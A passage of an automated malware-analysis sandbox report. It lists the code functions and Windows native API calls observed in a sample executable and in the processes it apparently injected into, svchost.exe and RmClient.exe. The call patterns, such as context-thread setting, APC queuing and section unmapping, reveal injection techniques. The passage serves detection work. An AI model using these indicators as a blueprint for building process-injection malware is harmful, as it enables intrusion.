Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672CF0 NtOpenProcess, 2_2_03672CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672CC0 NtQueryVirtualMemory, 2_2_03672CC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672CA0 NtQueryInformationToken, 2_2_03672CA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03673010 NtOpenDirectoryObject, 2_2_03673010
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03673090 NtSetValueKey, 2_2_03673090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036739B0 NtGetContextThread, 2_2_036739B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03673D70 NtOpenThread, 2_2_03673D70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03673D10 NtOpenProcessToken, 2_2_03673D10
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E64340 NtSetContextThread,LdrInitializeThunk, 5_2_02E64340
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E64650 NtSuspendThread,LdrInitializeThunk, 5_2_02E64650
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62AF0 NtWriteFile,LdrInitializeThunk, 5_2_02E62AF0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62AD0 NtReadFile,LdrInitializeThunk, 5_2_02E62AD0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62BE0 NtQueryValueKey,LdrInitializeThunk, 5_2_02E62BE0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_02E62BF0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62BA0 NtEnumerateValueKey,LdrInitializeThunk, 5_2_02E62BA0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62B60 NtClose,LdrInitializeThunk, 5_2_02E62B60
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62EE0 NtQueueApcThread,LdrInitializeThunk, 5_2_02E62EE0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62E80 NtReadVirtualMemory,LdrInitializeThunk, 5_2_02E62E80
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62FE0 NtCreateFile,LdrInitializeThunk, 5_2_02E62FE0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62FB0 NtResumeThread,LdrInitializeThunk, 5_2_02E62FB0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62F30 NtCreateSection,LdrInitializeThunk, 5_2_02E62F30
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62CA0 NtQueryInformationToken,LdrInitializeThunk, 5_2_02E62CA0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62C60 NtCreateKey,LdrInitializeThunk, 5_2_02E62C60
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62C70 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_02E62C70
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62DF0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_02E62DF0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62DD0 NtDelayExecution,LdrInitializeThunk, 5_2_02E62DD0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62D30 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_02E62D30
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62D10 NtMapViewOfSection,LdrInitializeThunk, 5_2_02E62D10
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E635C0 NtCreateMutant,LdrInitializeThunk, 5_2_02E635C0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E639B0 NtGetContextThread,LdrInitializeThunk, 5_2_02E639B0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62AB0 NtWaitForSingleObject, 5_2_02E62AB0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62B80 NtQueryInformationFile, 5_2_02E62B80
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62EA0 NtAdjustPrivilegesToken, 5_2_02E62EA0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62E30 NtWriteVirtualMemory, 5_2_02E62E30
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62FA0 NtQuerySection, 5_2_02E62FA0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62F90 NtProtectVirtualMemory, 5_2_02E62F90
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62F60 NtCreateProcessEx, 5_2_02E62F60
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62CF0 NtOpenProcess, 5_2_02E62CF0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62CC0 NtQueryVirtualMemory, 5_2_02E62CC0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62C00 NtQueryInformationProcess, 5_2_02E62C00
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62DB0 NtEnumerateKey, 5_2_02E62DB0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E62D00 NtSetInformationFile, 5_2_02E62D00
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E63090 NtSetValueKey, 5_2_02E63090
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E63010 NtOpenDirectoryObject, 5_2_02E63010
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E63D70 NtOpenThread, 5_2_02E63D70
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E63D10 NtOpenProcessToken, 5_2_02E63D10
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_006A8D80 NtCreateFile, 5_2_006A8D80
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_006A8EF0 NtReadFile, 5_2_006A8EF0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_006A8FE0 NtDeleteFile, 5_2_006A8FE0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_006A9080 NtClose, 5_2_006A9080
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_006A91E0 NtAllocateVirtualMemory, 5_2_006A91E0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02CEF0E9 NtQueryInformationProcess, 5_2_02CEF0E9
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02CEFA38 NtSetContextThread, 5_2_02CEFA38
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle, 0_2_00431BE8
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00446313
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 0_2_004333BE
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_004096A0 0_2_004096A0
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0042200C 0_2_0042200C
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0041A217 0_2_0041A217
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_00412216 0_2_00412216
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0042435D 0_2_0042435D
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_004033C0 0_2_004033C0
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0044F430 0_2_0044F430
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_004125E8 0_2_004125E8
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0044663B 0_2_0044663B
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_00413801 0_2_00413801
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0042096F 0_2_0042096F
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_004129D0 0_2_004129D0
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_004119E3 0_2_004119E3
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0041C9AE 0_2_0041C9AE
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0047EA6F 0_2_0047EA6F
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0040FA10 0_2_0040FA10
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0044EB5F 0_2_0044EB5F
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_00423C81 0_2_00423C81
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_00411E78 0_2_00411E78
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_00442E0C 0_2_00442E0C
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_00420EC0 0_2_00420EC0
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0044CF17 0_2_0044CF17
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_00444FD2 0_2_00444FD2
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0420A648 0_2_0420A648
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004183F3 2_2_004183F3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004030F0 2_2_004030F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401220 2_2_00401220
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042EA23 2_2_0042EA23
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040FC73 2_2_0040FC73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040256C 2_2_0040256C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00402510 2_2_00402510
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004165CE 2_2_004165CE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004165D3 2_2_004165D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040FE93 2_2_0040FE93
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040DF13 2_2_0040DF13
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036FA352 2_2_036FA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0364E3F0 2_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037003E6 2_2_037003E6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E0274 2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C02C0 2_2_036C02C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C8158 2_2_036C8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03630100 2_2_03630100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DA118 2_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036F81CC 2_2_036F81CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036F41A2 2_2_036F41A2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037001AA 2_2_037001AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D2000 2_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640770 2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03664750 2_2_03664750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363C7C0 2_2_0363C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365C6E0 2_2_0365C6E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640535 2_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03700591 2_2_03700591
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036F2446 2_2_036F2446
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E4420 2_2_036E4420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036EE4F6 2_2_036EE4F6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036FAB40 2_2_036FAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036F6BD7 2_2_036F6BD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363EA80 2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03656962 2_2_03656962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036429A0 2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0370A9A6 2_2_0370A9A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0364A840 2_2_0364A840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03642840 2_2_03642840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366E8F0 2_2_0366E8F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036268B8 2_2_036268B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B4F40 2_2_036B4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03682F28 2_2_03682F28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03660F30 2_2_03660F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E2F30 2_2_036E2F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0364CFE0 2_2_0364CFE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03632FC8 2_2_03632FC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036BEFA0 2_2_036BEFA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640E59 2_2_03640E59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036FEE26 2_2_036FEE26
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036FEEDB 2_2_036FEEDB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03652E90 2_2_03652E90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036FCE93 2_2_036FCE93
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0364AD00 2_2_0364AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DCD1F 2_2_036DCD1F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363ADE0 2_2_0363ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03658DBF 2_2_03658DBF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640C00 2_2_03640C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03630CF2 2_2_03630CF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E0CB5 2_2_036E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362D34C 2_2_0362D34C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036F132D 2_2_036F132D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0368739A 2_2_0368739A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E12ED 2_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365B2C0 2_2_0365B2C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036452A0 2_2_036452A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0367516C 2_2_0367516C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362F172 2_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0370B16B 2_2_0370B16B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0364B1B0 2_2_0364B1B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036F70E9 2_2_036F70E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036FF0E0 2_2_036FF0E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036EF0CC 2_2_036EF0CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036470C0 2_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036FF7B0 2_2_036FF7B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03685630 2_2_03685630
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036F16CC 2_2_036F16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036F7571 2_2_036F7571
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037095C3 2_2_037095C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DD5B0 2_2_036DD5B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03631460 2_2_03631460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036FF43F 2_2_036FF43F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036FFB76 2_2_036FFB76
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B5BF0 2_2_036B5BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0367DBF9 2_2_0367DBF9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365FB80 2_2_0365FB80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B3A6C 2_2_036B3A6C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036FFA49 2_2_036FFA49
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036F7A46 2_2_036F7A46
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036EDAC6 2_2_036EDAC6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DDAAC 2_2_036DDAAC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03685AA0 2_2_03685AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E1AA3 2_2_036E1AA3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03649950 2_2_03649950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365B950 2_2_0365B950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D5910 2_2_036D5910
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AD800 2_2_036AD800
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036438E0 2_2_036438E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036FFF09 2_2_036FFF09
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03603FD2 2_2_03603FD2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03603FD5 2_2_03603FD5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036FFFB1 2_2_036FFFB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03641F92 2_2_03641F92
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03649EB0 2_2_03649EB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036F7D73 2_2_036F7D73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03643D40 2_2_03643D40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036F1D5A 2_2_036F1D5A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365FDC0 2_2_0365FDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B9C32 2_2_036B9C32
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036FFCF2 2_2_036FFCF2
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe Code function: 3_2_029E7AFC 3_2_029E7AFC
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe Code function: 3_2_02A068AC 3_2_02A068AC
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe Code function: 3_2_029EE45C 3_2_029EE45C
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe Code function: 3_2_029EE457 3_2_029EE457
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe Code function: 3_2_029E5D9C 3_2_029E5D9C
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe Code function: 3_2_029E7D1C 3_2_029E7D1C
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EB02C0 5_2_02EB02C0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02ED0274 5_2_02ED0274
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EF03E6 5_2_02EF03E6
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E3E3F0 5_2_02E3E3F0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EEA352 5_2_02EEA352
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EC2000 5_2_02EC2000
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EE81CC 5_2_02EE81CC
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EF01AA 5_2_02EF01AA
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EE41A2 5_2_02EE41A2
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EB8158 5_2_02EB8158
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E20100 5_2_02E20100
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02ECA118 5_2_02ECA118
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E4C6E0 5_2_02E4C6E0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E2C7C0 5_2_02E2C7C0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E30770 5_2_02E30770
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E54750 5_2_02E54750
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EDE4F6 5_2_02EDE4F6
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EE2446 5_2_02EE2446
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02ED4420 5_2_02ED4420
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EF0591 5_2_02EF0591
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E30535 5_2_02E30535
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E2EA80 5_2_02E2EA80
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EE6BD7 5_2_02EE6BD7
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EEAB40 5_2_02EEAB40
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E5E8F0 5_2_02E5E8F0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E168B8 5_2_02E168B8
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E3A840 5_2_02E3A840
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E32840 5_2_02E32840
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E329A0 5_2_02E329A0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EFA9A6 5_2_02EFA9A6
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E46962 5_2_02E46962
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EEEEDB 5_2_02EEEEDB
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E42E90 5_2_02E42E90
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EECE93 5_2_02EECE93
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E30E59 5_2_02E30E59
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EEEE26 5_2_02EEEE26
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E3CFE0 5_2_02E3CFE0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E22FC8 5_2_02E22FC8
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EAEFA0 5_2_02EAEFA0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EA4F40 5_2_02EA4F40
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E72F28 5_2_02E72F28
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E50F30 5_2_02E50F30
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02ED2F30 5_2_02ED2F30
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E20CF2 5_2_02E20CF2
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02ED0CB5 5_2_02ED0CB5
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E30C00 5_2_02E30C00
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E2ADE0 5_2_02E2ADE0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E48DBF 5_2_02E48DBF
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E3AD00 5_2_02E3AD00
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02ECCD1F 5_2_02ECCD1F
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02ED12ED 5_2_02ED12ED
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E4B2C0 5_2_02E4B2C0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E352A0 5_2_02E352A0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E7739A 5_2_02E7739A
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E1D34C 5_2_02E1D34C
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EE132D 5_2_02EE132D
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EE70E9 5_2_02EE70E9
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EEF0E0 5_2_02EEF0E0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EDF0CC 5_2_02EDF0CC
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E370C0 5_2_02E370C0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E3B1B0 5_2_02E3B1B0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EFB16B 5_2_02EFB16B
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E6516C 5_2_02E6516C
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E1F172 5_2_02E1F172
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EE16CC 5_2_02EE16CC
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E75630 5_2_02E75630
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EEF7B0 5_2_02EEF7B0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E21460 5_2_02E21460
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EEF43F 5_2_02EEF43F
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EF95C3 5_2_02EF95C3
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02ECD5B0 5_2_02ECD5B0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EE7571 5_2_02EE7571
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EDDAC6 5_2_02EDDAC6
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02ECDAAC 5_2_02ECDAAC
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E75AA0 5_2_02E75AA0
